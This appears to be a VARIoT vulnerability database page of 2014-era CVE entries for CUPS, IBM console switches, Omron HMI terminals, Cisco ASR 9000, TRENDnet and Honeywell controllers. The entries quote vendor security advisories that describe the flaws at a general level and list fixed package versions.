VARIoT IoT vulnerabilities database
| VAR-201407-0415 | CVE-2014-5031 | CUPS of Web Vulnerabilities that capture important information in the interface |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The web interface in CUPS before 2.0 does not check that files have world-readable permissions, which allows remote attackers to obtains sensitive information via unspecified vectors. The Common Unix Printing System (CUPS) is a universal Unix printing system that is a cross-platform printing solution for Unix environments. It is based on the Internet printing protocol and provides most PostScript and raster printing. The CUPS Web Interface has a local privilege escalation vulnerability that allows attacks. Use vulnerabilities for symbolic link attacks to overwrite any file in the context of the affected application. Other attacks may also be possible.
An attacker with local access could potentially exploit this issue to gain elevated privileges.
CUPS 1.7.4 and earlier versions are vulnerable. A remote attacker could exploit this vulnerability to obtain sensitive information. ============================================================================
Ubuntu Security Notice USN-2341-1
September 08, 2014
cups vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
CUPS could be made to expose sensitive information, leading to privilege
escalation.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
cups 1.7.2-0ubuntu1.2
Ubuntu 12.04 LTS:
cups 1.5.3-0ubuntu8.5
Ubuntu 10.04 LTS:
cups 1.4.3-1ubuntu1.13
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: cups security and bug fix update
Advisory ID: RHSA-2014:1388-02
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1388.html
Issue date: 2014-10-14
CVE Names: CVE-2014-2856 CVE-2014-3537 CVE-2014-5029
CVE-2014-5030 CVE-2014-5031
=====================================================================
1. Summary:
Updated cups packages that fix multiple security issues and several bugs
are now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. (CVE-2014-2856)
It was discovered that CUPS allowed certain users to create symbolic links
in certain directories under /var/cache/cups/. A local user with the 'lp'
group privileges could use this flaw to read the contents of arbitrary
files on the system or, potentially, escalate their privileges on the
system. (CVE-2014-3537, CVE-2014-5029, CVE-2014-5030, CVE-2014-5031)
The CVE-2014-3537 issue was discovered by Francisco Alonso of Red Hat
Product Security.
These updated cups packages also include several bug fixes. Space precludes
documenting all of these changes in this advisory. Users are directed to
the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the
References section, for information on the most significant of these
changes.
All cups users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. After installing this
update, the cupsd daemon will be restarted automatically.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
978387 - Bad IPP responses with version 2.0 (collection handling bug)
1012482 - /etc/cron.daily/cups breaks rule GEN003080 in Red Hat security guide
1087122 - CVE-2014-2856 cups: cross-site scripting flaw fixed in the 1.7.2 release
1115576 - CVE-2014-3537 cups: insufficient checking leads to privilege escalation
1122600 - CVE-2014-5029 cups: Incomplete fix for CVE-2014-3537
1128764 - CVE-2014-5030 cups: allows local users to read arbitrary files via a symlink attack
1128767 - CVE-2014-5031 cups: world-readable permissions
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
ppc64:
cups-1.4.2-67.el6.ppc64.rpm
cups-debuginfo-1.4.2-67.el6.ppc.rpm
cups-debuginfo-1.4.2-67.el6.ppc64.rpm
cups-devel-1.4.2-67.el6.ppc.rpm
cups-devel-1.4.2-67.el6.ppc64.rpm
cups-libs-1.4.2-67.el6.ppc.rpm
cups-libs-1.4.2-67.el6.ppc64.rpm
cups-lpd-1.4.2-67.el6.ppc64.rpm
s390x:
cups-1.4.2-67.el6.s390x.rpm
cups-debuginfo-1.4.2-67.el6.s390.rpm
cups-debuginfo-1.4.2-67.el6.s390x.rpm
cups-devel-1.4.2-67.el6.s390.rpm
cups-devel-1.4.2-67.el6.s390x.rpm
cups-libs-1.4.2-67.el6.s390.rpm
cups-libs-1.4.2-67.el6.s390x.rpm
cups-lpd-1.4.2-67.el6.s390x.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
ppc64:
cups-debuginfo-1.4.2-67.el6.ppc64.rpm
cups-php-1.4.2-67.el6.ppc64.rpm
s390x:
cups-debuginfo-1.4.2-67.el6.s390x.rpm
cups-php-1.4.2-67.el6.s390x.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-2856.html
https://www.redhat.com/security/data/cve/CVE-2014-3537.html
https://www.redhat.com/security/data/cve/CVE-2014-5029.html
https://www.redhat.com/security/data/cve/CVE-2014-5030.html
https://www.redhat.com/security/data/cve/CVE-2014-5031.html
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/6.6_Technical_Notes/cups.html#RHSA-2014-1388
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUPKsIXlSAg2UNWIIRApSvAJ9WxP5yQ+v5GDRGnSINYq0Pro0AoQCfXZqW
WjIIQcBG+Sou8Is2vIFlLok=
=5S/K
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
A malformed file with an invalid page header and compressed raster data
can trigger a buffer overflow in cupsRasterReadPixels (CVE-2014-9679).
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2856
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3537
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5029
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5030
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5031
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9679
http://advisories.mageia.org/MGASA-2014-0193.html
http://advisories.mageia.org/MGASA-2014-0313.html
http://advisories.mageia.org/MGASA-2015-0067.html
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
0d1f31885b6c118b63449f2fdd821666 mbs2/x86_64/cups-1.7.0-8.1.mbs2.x86_64.rpm
b5337600a386f902763653796a2cefdf mbs2/x86_64/cups-common-1.7.0-8.1.mbs2.x86_64.rpm
7b1513d85b5f22cd90bed23a35e44f51 mbs2/x86_64/cups-filesystem-1.7.0-8.1.mbs2.noarch.rpm
c25fa9b9bba101274984fa2b7a62f7a3 mbs2/x86_64/lib64cups2-1.7.0-8.1.mbs2.x86_64.rpm
df24a6b84fdafffaadf961ab4aa3640b mbs2/x86_64/lib64cups2-devel-1.7.0-8.1.mbs2.x86_64.rpm
5c172624c992de8ebb2bf8a2b232ee3a mbs2/SRPMS/cups-1.7.0-8.1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVF6q1mqjQ0CJFipgRAuxXAKDq8A/WlNzp54yRN7xnKy8ZBaRZQwCfSAh0
n7hHPzmYVzh2wFP6PffIl0E=
=ykhv
-----END PGP SIGNATURE-----
.
For the stable distribution (wheezy), these problems have been fixed in
version 1.5.3-5+deb7u4.
For the unstable distribution (sid), these problems have been fixed in
version 1.7.4-2
| VAR-201407-0414 | CVE-2014-5030 | CUPS Vulnerable to reading arbitrary files |
CVSS V2: 1.9 CVSS V3: - Severity: LOW |
CUPS before 2.0 allows local users to read arbitrary files via a symlink attack on (1) index.html, (2) index.class, (3) index.pl, (4) index.php, (5) index.pyc, or (6) index.py. The Common Unix Printing System (CUPS) is a universal Unix printing system that is a cross-platform printing solution for Unix environments. It is based on the Internet printing protocol and provides most PostScript and raster printing. The CUPS Web Interface has a local privilege escalation vulnerability that allows attacks. Use vulnerabilities for symbolic link attacks to overwrite any file in the context of the affected application. Other attacks may also be possible.
An attacker with local access could potentially exploit this issue to gain elevated privileges.
CUPS 1.7.4 and earlier versions are vulnerable. ============================================================================
Ubuntu Security Notice USN-2341-1
September 08, 2014
cups vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
CUPS could be made to expose sensitive information, leading to privilege
escalation.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
cups 1.7.2-0ubuntu1.2
Ubuntu 12.04 LTS:
cups 1.5.3-0ubuntu8.5
Ubuntu 10.04 LTS:
cups 1.4.3-1ubuntu1.13
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: cups security and bug fix update
Advisory ID: RHSA-2014:1388-02
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1388.html
Issue date: 2014-10-14
CVE Names: CVE-2014-2856 CVE-2014-3537 CVE-2014-5029
CVE-2014-5030 CVE-2014-5031
=====================================================================
1. Summary:
Updated cups packages that fix multiple security issues and several bugs
are now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. (CVE-2014-2856)
It was discovered that CUPS allowed certain users to create symbolic links
in certain directories under /var/cache/cups/. A local user with the 'lp'
group privileges could use this flaw to read the contents of arbitrary
files on the system or, potentially, escalate their privileges on the
system. (CVE-2014-3537, CVE-2014-5029, CVE-2014-5030, CVE-2014-5031)
The CVE-2014-3537 issue was discovered by Francisco Alonso of Red Hat
Product Security.
These updated cups packages also include several bug fixes. Space precludes
documenting all of these changes in this advisory. Users are directed to
the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the
References section, for information on the most significant of these
changes.
All cups users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. After installing this
update, the cupsd daemon will be restarted automatically.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
978387 - Bad IPP responses with version 2.0 (collection handling bug)
1012482 - /etc/cron.daily/cups breaks rule GEN003080 in Red Hat security guide
1087122 - CVE-2014-2856 cups: cross-site scripting flaw fixed in the 1.7.2 release
1115576 - CVE-2014-3537 cups: insufficient checking leads to privilege escalation
1122600 - CVE-2014-5029 cups: Incomplete fix for CVE-2014-3537
1128764 - CVE-2014-5030 cups: allows local users to read arbitrary files via a symlink attack
1128767 - CVE-2014-5031 cups: world-readable permissions
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
ppc64:
cups-1.4.2-67.el6.ppc64.rpm
cups-debuginfo-1.4.2-67.el6.ppc.rpm
cups-debuginfo-1.4.2-67.el6.ppc64.rpm
cups-devel-1.4.2-67.el6.ppc.rpm
cups-devel-1.4.2-67.el6.ppc64.rpm
cups-libs-1.4.2-67.el6.ppc.rpm
cups-libs-1.4.2-67.el6.ppc64.rpm
cups-lpd-1.4.2-67.el6.ppc64.rpm
s390x:
cups-1.4.2-67.el6.s390x.rpm
cups-debuginfo-1.4.2-67.el6.s390.rpm
cups-debuginfo-1.4.2-67.el6.s390x.rpm
cups-devel-1.4.2-67.el6.s390.rpm
cups-devel-1.4.2-67.el6.s390x.rpm
cups-libs-1.4.2-67.el6.s390.rpm
cups-libs-1.4.2-67.el6.s390x.rpm
cups-lpd-1.4.2-67.el6.s390x.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
ppc64:
cups-debuginfo-1.4.2-67.el6.ppc64.rpm
cups-php-1.4.2-67.el6.ppc64.rpm
s390x:
cups-debuginfo-1.4.2-67.el6.s390x.rpm
cups-php-1.4.2-67.el6.s390x.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-2856.html
https://www.redhat.com/security/data/cve/CVE-2014-3537.html
https://www.redhat.com/security/data/cve/CVE-2014-5029.html
https://www.redhat.com/security/data/cve/CVE-2014-5030.html
https://www.redhat.com/security/data/cve/CVE-2014-5031.html
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/6.6_Technical_Notes/cups.html#RHSA-2014-1388
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUPKsIXlSAg2UNWIIRApSvAJ9WxP5yQ+v5GDRGnSINYq0Pro0AoQCfXZqW
WjIIQcBG+Sou8Is2vIFlLok=
=5S/K
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
It was discovered that the web interface in CUPS incorrectly
validated permissions on rss files and directory index files.
A malformed file with an invalid page header and compressed raster data
can trigger a buffer overflow in cupsRasterReadPixels (CVE-2014-9679).
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2856
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3537
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5029
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5030
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5031
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9679
http://advisories.mageia.org/MGASA-2014-0193.html
http://advisories.mageia.org/MGASA-2014-0313.html
http://advisories.mageia.org/MGASA-2015-0067.html
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
0d1f31885b6c118b63449f2fdd821666 mbs2/x86_64/cups-1.7.0-8.1.mbs2.x86_64.rpm
b5337600a386f902763653796a2cefdf mbs2/x86_64/cups-common-1.7.0-8.1.mbs2.x86_64.rpm
7b1513d85b5f22cd90bed23a35e44f51 mbs2/x86_64/cups-filesystem-1.7.0-8.1.mbs2.noarch.rpm
c25fa9b9bba101274984fa2b7a62f7a3 mbs2/x86_64/lib64cups2-1.7.0-8.1.mbs2.x86_64.rpm
df24a6b84fdafffaadf961ab4aa3640b mbs2/x86_64/lib64cups2-devel-1.7.0-8.1.mbs2.x86_64.rpm
5c172624c992de8ebb2bf8a2b232ee3a mbs2/SRPMS/cups-1.7.0-8.1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVF6q1mqjQ0CJFipgRAuxXAKDq8A/WlNzp54yRN7xnKy8ZBaRZQwCfSAh0
n7hHPzmYVzh2wFP6PffIl0E=
=ykhv
-----END PGP SIGNATURE-----
.
For the stable distribution (wheezy), these problems have been fixed in
version 1.5.3-5+deb7u4.
For the unstable distribution (sid), these problems have been fixed in
version 1.7.4-2
| VAR-201408-0283 | CVE-2014-3085 | IBM GCM16 and GCM32 Global Console Manager Switch firmware systest.php Vulnerable to arbitrary command execution |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
systest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the lpres parameter. IBM 1754 GCM16 and GCM32 Global Console Managers are prone to an unspecified remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
The following versions are vulnerable:
IBM 1754 GCM16 Global Console Manager running firmware 1.20.0.22575 and prior
IBM 1754 GCM32 Global Console Manager running firmware 1.20.0.22575 and prior. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access
| VAR-201407-0238 | CVE-2014-2369 | Omron NS series HMI Terminals Cross-Site Request Forgery Vulnerability |
CVSS V2: 6.0 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in the web application on Omron NS5, NS8, NS10, NS12, and NS15 HMI terminals 8.1xx through 8.68x allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors. Omron NS5, NS8, NS10, NS12 and NS15 HMI Terminals are Omron's touch screen HMI programming software. Allows remote attackers to perform unauthorized operations with specially crafted data. This may lead to further attacks. The following products are affected: Omron NS5, NS8, NS10, NS12, NS15 HMI Terminals versions 8.1xx to 8.68x
| VAR-201407-0239 | CVE-2014-2370 | Omron NS Series HMI Terminal Web Application cross-site scripting vulnerability |
CVSS V2: 3.5 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the web application on Omron NS5, NS8, NS10, NS12, and NS15 HMI terminals 8.1xx through 8.68x allows remote authenticated users to inject arbitrary web script or HTML via crafted data. Omron NS5, NS8, NS10, NS12 and NS15 HMI Terminals are Omron's touch screen HMI programming software. There is an HTML injection vulnerability in Omron NS series HMI Terminals.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. The following products and versions are affected: Omron NS5, NS8, NS10, NS12, NS15 HMI Terminals 8.1xx to 8.68x versions
| VAR-201407-0385 | CVE-2014-3322 | Cisco ASR 9000 Run on device Cisco IOS XR Service disruption in (DoS) Vulnerabilities |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR 4.3(.2) and earlier on ASR 9000 devices does not properly perform NetFlow sampling of IP packets, which allows remote attackers to cause a denial of service (chip and card hangs) via malformed (1) IPv4 or (2) IPv6 packets, aka Bug ID CSCuo68417. Cisco IOS XR is a member of the Cisco IOS Software family that uses a microkernel-based operating system architecture.
Attackers can exploit this issue to cause the NP chip and a line card on an affected device to lock up and reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuo68417. The vulnerability is caused by the fact that the program does not perform sampling of NetFlow IP packets
| VAR-201407-0750 | No CVE | TRENDnet TEW-732BR has an unknown vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
TRENDnet TEW-732BR is a routing device. There are unexplained vulnerabilities in TRENDnet TEW-732BR, and no detailed vulnerability details are available.
| VAR-201407-0540 | CVE-2014-2717 | Honeywell FALCON XLWeb Controllers Authentication Bypass Vulnerability |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
Honeywell FALCON XLWeb Linux controller devices 2.04.01 and earlier and FALCON XLWeb XLWebExe controller devices 2.02.11 and earlier allow remote attackers to bypass authentication and obtain administrative access by visiting the change-password page. Supplementary information : CWE Vulnerability type by CWE-552: Files or Directories Accessible to External Parties ( Externally accessible file or directory ) Has been identified. http://cwe.mitre.org/data/definitions/552.htmlIf a third party accesses the password change page, authentication may be bypassed and administrative access may be obtained. Honeywell is a manufacturing company focused on automation control. An attacker could exploit this vulnerability to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. Vulnerabilities
---------------
CVSS 10 - INSECURE CREDENTIAL STORAGE (Pass the Hash) CVE-2015-7914
CVSS 10 - INSECURE TRANSMISSION OF CREDENTIALS CVE-2015-7915
CVSS 7.4 - CROSS-SITE SCRIPTING CVE-2015-7916
Other risk exposures
---------------
Undocumented default accounts
Note that default accounts with changeable passwords, even when those
are undocumented and do not look as user accounts neither in interface
or documentation, constitute a formal vulnerability. It is at worst a
misconfiguration.
